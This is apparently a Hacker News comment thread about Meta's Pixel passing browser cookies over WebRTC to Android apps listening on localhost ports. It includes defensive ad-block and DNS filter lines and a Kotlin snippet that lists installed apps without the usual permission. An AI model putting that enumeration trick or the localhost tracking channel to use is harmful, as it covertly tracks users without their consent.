Apparently this was a European team of researchers, which would mean that Meta very likely breached the GDPR and ePrivacy Directive. Let's hope this gets very expensive for Meta.
Nothing quite like an instant panicked coverup to confirm guilt and intent.
Hopefully not too late to make it into the lawsuit. Assholes.
As someone who works for a similar large org, it's just as likely that some low-level programmer put it in without much thought, and then this got surfaced to higher-up people who didn't know about it and told them to remove it immediately.
It seems incredibly unlikely a low level programmer could come up with this method then get the necessary code into both the tracking pixel served to third party sites and Meta's android apps without some higher ups knowing about it.
Zuckerberg personally signed off on torrenting books for Llama. It would be a particularly dim group of “low level” programmers who did this without trying to first secure some upper level approvals to share the blame once caught.
Or at the very least, it's unlikely a low-level programmer wouldn't claim credit for it during performance reviews, which are reviewed by more senior people.
You claim some low-level programmer created a feature that opens a new network connection between two separate applications?
Just some guy working at facebook was able to ship network code in not just one but two code-bases without any senior or higher engineers in the loop?
That's the claim? If that was true (it's not) it would be even worse than high level executives being involved.
I sure hope there's a lawsuit. Over the last ten years, I've gotten over $2,000 in lawsuit settlement checks from Meta, alone.
I have a savings account at one of my banks that I use just for these settlement checks. Sometimes they're just $5. Sometimes they're a lot more. I think the most I ever got was around $500.
It's a little bit here, and a little bit there, but at the rate it's going, in another five years, I'll be able to buy a car with privacy violation money.
> The Meta (Facebook) Pixel JavaScript, when loaded in an Android mobile web browser, transmits the first-party _fbp cookie using WebRTC to UDP ports 12580–12585 to any app on the device that is listening on those ports.
And people on HN dismiss those who choose to browse with Javascript disabled.
There's a reason that the Javascript toggle is listed under the Security tab on Safari.
Worse, people on HN celebrate when websites add anti-bot protection that prevent you from accessing the website without JS.
These companies have demonstrated repeatedly that fines are just the cost of doing business. Doesn't matter if you charge them $1 million or $1 billion. They have still made significantly more than that from the crime.
The sum absolutely does matter. All you’re saying is the fines are too low
That's.. quite the contradictory sentence.
That's why fines should scale up geometrically with repeat offenses.
Simple question: would disabling apps from running in the background prevent this? Or, more simply, not staying logged into an app on your phone?
Yes, preventing the app from running in the background (entirely) would prevent it from listening on a port and collaborating with websites via this exploit.
As for the second part: no, logging out of the apps would not necessarily be enough. The apps can still link all the different web sessions together for surveillance purposes, whether or not they are also linked to an account within the app. Meta famously maintains "shadow profiles" of data not (yet) associated with a user of the service. Plus, the apps can trivially remember who was last logged in.
This just reinforced the use of uMatrix. Governments should mandate browser vendors to implement any standards gorhill might come up with.
Unfortunately in modern web uMatrix is just incredibly annoying. Nearly every site breaks for various reasons and often allowing everything in uMatrix still doesn't fix the issue.
Card payments, especially with 3-D Secure flows that use iframes, are one of the biggest problems. This often leads to creating a new order several times, since allowing something + reloading loses the entire flow.
Captchas are also a massive pain, probably because they can't fingerprint as well as they normally do?
Life after having disabled uMatrix completely has been better.
If only uMatrix was still developed/supported.
It still works very well. I'm using it on both Linux and Android. The UI is far better than its replacement inside uBO.
The uBO functionality isn't a legitimate replacement. I don't understand how that came to pass.
Those extensions are from the same author. I don't know the details but maybe gorhill didn't have the time to maintain uMatrix anymore and added the very minimum uMatrix functionality to uBO and settled for that. Luckily uMatrix keeps working.
Sounds like blocking these tracking scripts using uBlockOrigin probably prevents this. Another reason to use uBlockOrigin.
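For what it's worth, uBlock Origin's default lists (EasyPrivacy among them) already cover the Pixel. Static filters in Adblock syntax along these lines are what does the work; these two are illustrative examples, not quotes from the lists (connect.facebook.net serves the Pixel script, and facebook.com/tr is its reporting endpoint):

```
||connect.facebook.net^
||facebook.com/tr^
```

Note this only stops the script from loading; it does nothing about an app already listening on localhost.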
Doing something like this should result in Meta and such being legally annihilated. But nothing will happen, as usual.
What's the crime?
Tracking users without their consent. This is a crime in the EU. It’s a crime that it’s not a crime in the US.
Unauthorized access to a computer system. I'm sure if I connected to some port on a computer belonging to Meta without them wanting it, that would be the crime I would be charged with. But somehow if Meta connects to a port on my phone without me agreeing to it, it's not a crime?
Yes... and that listening service is their software that you installed on your device... So caveat emptor.
What function does Instagram provide with this WebRTC listener besides tracking?
People install Instagram to look at photos and reels, not to help Facebook track them better.
If I put a crypto-mining script in a game I don't get to claim "well they installed the app" when people complain. The victims thought they were installing a game, not a crypto-miner.
Here, the victims thought they were installing a photo sharing application, not a tracking relay.
Found the Meta PM who thought of this idea.
Software that came preloaded with what sounds suspiciously like a rootkit to keep the background service running on some phones.
Please don't "don't that phone then" because it's the same all the way down to rotary telephones.
I still didn't consent to meta tracking me on my telephone. I understand the shadow profiles and tracking pixels and whatnot, but cmon.
Next year "actually meta was listening to conversations captured by android devices and using it to target ads"
Don't use a cellphone? Meta and Google track desktop web use. Don't use a computer? Okay, that's cool.
Spying on users, connecting their real-life identities to their browsing history without their consent or knowledge?
Stalking? Maybe even something under the ECPA.
Crap like this is why I haven't had the Facebook or Instagram apps installed for years. I still have accounts, but I only visit them via the browser.
It just makes me want to bin my phone, tbh. Thank God for RMS and Linus that you can at least run GNU and Linux on a laptop, as there is little left outside the panopticon.
I am not going to register with FB because they now require a 3D face scan to use it.
And with all that tracking and spying on me, plus a boatload of voluntarily submitted data, Facebook still can't (or won't) show me any relevant advertising. I mean, even from the corpo point of view. Whenever I open my feed to read something, I see a boatload of complete garbage ads. They are neither enticing to me nor promoting something corpos might want to shove in my face so I'd remember it, like some Coca-Cola or whatever product. But no, they have nothing.
I've just opened my FB feed; let's see what the ads are today:
Group Dull Men's Club - some garbage meme dump, neither interesting nor selling any product or service.
Women emigrant group - I'm male and in a different location.
Rundown - some NN-generated slop about the NN industry
Car crash meme group from a different location.
Math picture meme group
LOTR meme group
Photo group with a theme I'm not interested in
Repeat of the above
Another meme group
Roland-Garros page - I've never watched tennis or written about it. My profile follows pages for a different sport altogether. None of those show up in the ads.
Another fact/meme group
Repeat
Repeat
Another fact/meme group
Expat group from incorrect location
And so on it goes. Like, who pays for all this junk? Who coordinates the targeting? Why do they waste both their capacity and mine on something so useless for both me and Facebook? I would understand if FB showed ads for products or services, or something that loosely follows my likes. But what they have is a total, 100% miss. It's mind-boggling.
I guess the meme-group ads are there to draw you in; once you follow them, they get to push you actual ads, and it costs them less because Facebook doesn't charge them, thinking you want to see the group's posts. It must work to some extent.
It actually bothers me that it took so long to be discovered.
I'm incredibly glad this isn't occurring in the UK + EU, because GDPR and the huge fines levied against Meta in the past have scared them sufficiently into not doing this kind of behaviour.
I wonder if companies like Wetter Online (which we know sells location data to brokers [0]) or ad-service providers that ship embeddable libraries do the same.
If so, Google would knowingly be allowing this to happen and would be a co-conspirator. I mean, they surveil our devices as if they were their own home. It's impossible that they're not aware.
[0] https://netzpolitik-org.translate.goog/2025/databroker-files...
If you are even mildly technical you NEED to have a Pi-hole + Tailscale setup on your home network and all devices. Block all this malware at the root.
Or change your DNS to use NextDNS.
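Both approaches boil down to the same thing: answering DNS queries for tracker domains with a dead address so the script never loads. In dnsmasq syntax, which Pi-hole's resolver is built on (file locations vary by version, and the domain here is just an example):

```
# Resolve the Pixel's script host to 0.0.0.0 so fbevents.js never loads.
address=/connect.facebook.net/0.0.0.0
```

As with the browser-side filters above, DNS blocking prevents the Pixel from running at all, but it can't see, let alone block, UDP packets sent to 127.0.0.1.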
Facebook is stealing people's data? No way.
I hope a judge gives them a warning.
So Meta apps are spyware. And Zuck again has his finger in his mouth and a cat on his lap.
All Meta software is spyware. Whether it's an app or a website, they exist only to pacify you into spending as much time on them as possible so they can hoover up your data. If those apps/websites provide you with anything useful, it is just a ruse to get more data from you.
To me it's weird that they're willing to misuse browser APIs so blatantly for interprocess communication, when, as I understand it, server-side correlation using a combination of IP, battery level and screen dimensions probably already gets them 95% of the surveillance capability.
the invisible hand says they have to chase that last 5%, too
Why is this weird to you instead of being "of course they are" to you?
Ah yes, and every small Android dev gets banned from Play and AdMob for tiny, unexplained reasons, with no recourse and no way to communicate with Google. But Meta here probably won't face any problems at all. They should be temporarily banned!
On many threads here regarding EU fines, I see the sentiment "The EU only fines US tech to make a quick buck!".
It could be an idea to, you know, stop doing these things. Would be great to see another few $billion fine for this one.
The US could fine US tech too.
I bet most Americans would be OK with that: more privacy, more money for the state, and less for the greedy bastards.
The EU doesn't have to be the cop of US technology; in fact, it's a bit pathetic to have another country police your industry.
(R)ussia only punishes (R)ussian tech when it does not align with the party.
This is yet another reason for installing very few apps
The issue isn't the number of apps but that they come from a big-tech store and are closed source, which for 99% of apps means they will spy for profit.
You can install all of f-droid.org apps and not a single one will do that.
The case for installing very few mobile apps is directly proportional to the effort companies exert to get you to install them.
And they push REALLY hard.
Another, similar tracking vector lets any app detect all installed apps using an android.intent.action.MAIN query, without the QUERY_ALL_PACKAGES permission: https://support.google.com/googleplay/android-developer/thre...
No response from Google. Being used by dozens of apps in the wild.
Edit: Original Research link: https://peabee.substack.com/p/everyone-knows-what-apps-you-u... (HN: https://news.ycombinator.com/item?id=43518866 , 482 comments)
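For anyone who didn't click through: as I read the linked research, the trick is that a sufficiently broad <queries> declaration in the manifest makes QUERY_ALL_PACKAGES unnecessary. A hedged Kotlin sketch of the idea (details of the actual apps' implementations may differ):

```kotlin
import android.content.Intent
import android.content.pm.PackageManager

// Assumes the manifest declares a blanket query for MAIN intents, e.g.:
//
//   <queries>
//       <intent>
//           <action android:name="android.intent.action.MAIN" />
//       </intent>
//   </queries>
//
// With that in place, queryIntentActivities() enumerates nearly every
// launchable app on the device -- no QUERY_ALL_PACKAGES permission needed.
fun listLaunchableApps(pm: PackageManager): List<String> =
    pm.queryIntentActivities(Intent(Intent.ACTION_MAIN), 0)
        .map { it.activityInfo.packageName }
        .distinct()
```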
Incredible that this was locked.
dang likely got told not to upset the benefactors
Referring to the linked Google Developers thread.
Can you imagine the mental hoops you’d need to jump through as a developer to persuade yourself that this is a valid thing to implement?
Zero. People who work on ad-tech build ad-tech all day long, that's the entire job.
Seriously, why do you think all of the unquestionable things humanity has built have been built? It's because it's all just part of the job, for somebody.
People working in ad-tech question the things they're building just like the people at McDonald's flipping burgers are questioning the cholesterol levels of their customers. They're not.
Not many? You've never met a developer with a god complex?
My experience is that most developers just do as they are told.
Another reason why AI is so fascinatingly horrible: it’ll never question the moral impact of what you’re trying to do.
Except Claude was trying to rat out users in their newer trials. In the end, the best whistleblower could end up being the AI... not sure what that says about us, though.
Get paid - it's one hoop.
I mean, it is kind of a cool workaround. There's a lot of motivation in telling someone they can't do something, where "hide and watch" is a pretty typical response. The creative thinking that comes up with ideas like this is not something to discourage. It is a shame that the effort goes to such a shit purpose, but these "people" are not stupid, and not many other areas offer this kind of challenge.
> Meta and Yandex are de-anonymizing Android users' web browsing identifiers
Thank god that Microsoft and Google don't do this. Oh, wait... /s
What happened to all the hackers fighting for personal freedom and privacy? Meta paycheck too tasty?
We’re still fighting the fight. Turns out shifty assholes also figured out how to write code and get hired.
Thank you for your service!
In the early days of the information revolution, when computers were new and being nerdy was still seen (almost universally) as a bad thing, a very high proportion of computer enthusiasts were people already on the fringes of society, for one reason or another. For a large number of them, hacking was a way to express their preexisting antiestablishment tendencies. For a lot of them, they were also your basic angsty adolescents and young adults rebelling against The Man as soon as they found any way to do so.
As time went on, computers became more mainstream, and lots more people started using them as part of daily life. This didn't mean that the number of antiestablishment computer users or hackers went down—just that they were no longer nearly so high a percentage of the total number of computer users.
So the answer to "what happened to all the hackers fighting for personal freedom and privacy?" is kinda threefold:
1) They never went away. They're still here, at places like the EFF, fighting for our personal freedom and privacy. They're just much less noticeable in a world where everyone uses computers...and where many more of the prominent institutions actually know how to secure their networks.
2) They grew up. Captain Crunch, the famous phreaker, is 82 this year. Steve Wozniak is 74. And while, sure, some people reach that age and still maintain not merely a philosophy, but a practice, of activism, it's much harder to keep up, and even many of those whose principles do not change will shift to methods that stay more within the system (eg, supporting privacy legislation, or even running for office themselves).
3) They went to jail, were "scared straight", or died. The most prominent example of this group is, of course, Aaron Swartz, but many hacktivists will have had run-ins with the law, and of those many of them will have turned their back on the lifestyle to save themselves (even Captain Crunch was arrested and cooperated with the FBI).
Thanks for your thoughts! How can we create more hackers? I think the fear of punishment has really put a damper on things but not sure how that can be avoided.
Hacking isn't about crime. It's about exploration. There are lots of people showing "the youths" how interesting it is to break a lock or go around it. Basically, any time you can make a system do something fun, helpful, or interesting that it wasn't intended to do, that's hacking. You can be 100% law abiding with no fear of punishment and still get the full experience.
Well, note that my conclusion is largely that we have not, in fact, decreased the number of hackers, nor their proportion within the general population—just their proportion within the computer-using population, and that only by adding a large number of non-hackers to that population. I'm skeptical that we can ever increase the proportion of the population that has the hacker mindset much higher than it is without some kind of overall cultural shift (something that's beyond our power to affect).
But it's also unquestionably true that it's much easier to be a "hacker", in the sense we think of from the 1960s-80s, in a time and field where the hardware and software is simpler, more open, and less obfuscated. As such, I think it's probably not helpful to long for those bygone days—especially the "simpler" part—which we are clearly never getting back until and unless we make a breakthrough that is just as revolutionary as the transistor and the microchip were (and I'm skeptical as to whether that's possible, both in terms of what physics allow ever, and in terms of the shape of the corporate landscape now and for the foreseeable future). Honestly, a lot of the things that were possible back then, a lot of the incentive to get into hacking, was stuff that's actually hugely dangerous or invasive. Instead, I think it's better to focus on what we can do to improve the latter two parts of that equation: more open, less obfuscated.
Personally, I would say that the way toward that is pushing for, creating, and working on more open protocols and open standards, and insisting that those be used to enable more interoperability in place of proprietary formats and integration only with other software and hardware from the same company.
Who do you think found the issue?
Touché
At some point you reach a crossroads: either sell out and join Big Brother, or join the wandering homeless hordes on the streets.
Eh. You can have a very comfortable career doing work that still lets you look at yourself in the mirror. You don’t have to choose to burn the world to pay the rent.
I agree with you but I also don’t. It’s a privilege to have the ability to choose which job you work.
Not in this case. If you're qualified to get a job at a company that will pay you to sell out your neighbor, you're qualified to get a job with a decent boss who'll never ask you to do this kind of thing, pays 90% as much, and is still many times the national average salary.
The alternatives are not "doing evil" vs. "starving". They're getting paid well for doing evil, or getting paid well for doing good, or at least neutral, work.
Ok you’ve convinced me!